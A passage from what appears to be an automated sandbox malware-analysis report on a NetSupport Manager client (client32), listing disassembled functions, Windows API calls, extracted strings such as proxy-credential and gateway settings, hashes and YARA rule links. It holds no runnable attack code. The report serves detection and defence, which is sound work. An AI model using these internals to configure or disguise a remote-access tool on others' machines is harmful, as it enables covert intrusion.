                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                                                    • InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                                                                    • API String ID: 1428277488-3745656997
                                                                                                                                                    • Opcode ID: 7379e38c5c1183fd42387e7de37ee182c3fc9089f1a42e7092b3b40317450af4
                                                                                                                                                    • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                                                                                    • Opcode Fuzzy Hash: 7379e38c5c1183fd42387e7de37ee182c3fc9089f1a42e7092b3b40317450af4
                                                                                                                                                    • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                                                                                    Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                                                    • InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                                                    • _sprintf.LIBCMT ref: 11031401
                                                                                                                                                    • _setlocale.LIBCMT ref: 1103140B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                                                                    • API String ID: 4242130455-3745656997
                                                                                                                                                    • Opcode ID: 936d353a89e7de5d72b4b31bb00a29fbb2fe336fc4f16652f70a9f689e12861a
                                                                                                                                                    • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                                                                                    • Opcode Fuzzy Hash: 936d353a89e7de5d72b4b31bb00a29fbb2fe336fc4f16652f70a9f689e12861a
                                                                                                                                                    • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                                                                                    Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    • wsprintfA.USER32 ref: 11028814
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                                                                                    • wsprintfA.USER32 ref: 11028891
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                    • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                    • API String ID: 512045693-419896573
                                                                                                                                                    • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                                                    • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                                                                    • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                                                    • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                                                                    Function 6CA933A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                                    • API String ID: 2111968516-2157635994
                                                                                                                                                    • Opcode ID: 53f6ae2d703c75e5b12f0250e08ffff585b3af6e3801b158ec4e4fee44b924f5
                                                                                                                                                    • Instruction ID: e97117949c2dce293da391cff3620a0602e251cc84d14d84b3b6cc0faceea523
                                                                                                                                                    • Opcode Fuzzy Hash: 53f6ae2d703c75e5b12f0250e08ffff585b3af6e3801b158ec4e4fee44b924f5
                                                                                                                                                    • Instruction Fuzzy Hash: 2B22B5B2A11358AFDB24CE54CC81EEAB3B9BB49304F0886D9E54D67A40D6315FC8CF51
                                                                                                                                                    Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,1EF76653,034A7480,034A7470,?,00000000,1118368C,000000FF,?,11032002,034A7480,00000000,?,?,?), ref: 11086115
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                      • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                                                                                    • wsprintfA.USER32 ref: 110861EB
                                                                                                                                                    • wsprintfA.USER32 ref: 11086202
                                                                                                                                                    • wsprintfA.USER32 ref: 11086219
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D68
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D7B
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D8E
                                                                                                                                                      • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085DA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                    • API String ID: 4263811268-2492245516
                                                                                                                                                    • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                                                                                    • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                                                                    • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                                                                                    • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                                                                    Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                                                                    • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                                                                                    • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                                                                    • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                                                                                    • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                                                                                    Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,1EF76653,?,00000000,00000000), ref: 1102D594
                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                    • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                    • API String ID: 83693535-1096744297
                                                                                                                                                    • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                                                    • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                                                                    • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                                                    • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                                                                                    Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                                                                      • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                                                                      • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                      • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                    • API String ID: 596640303-1725438197
                                                                                                                                                    • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                                                                    • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
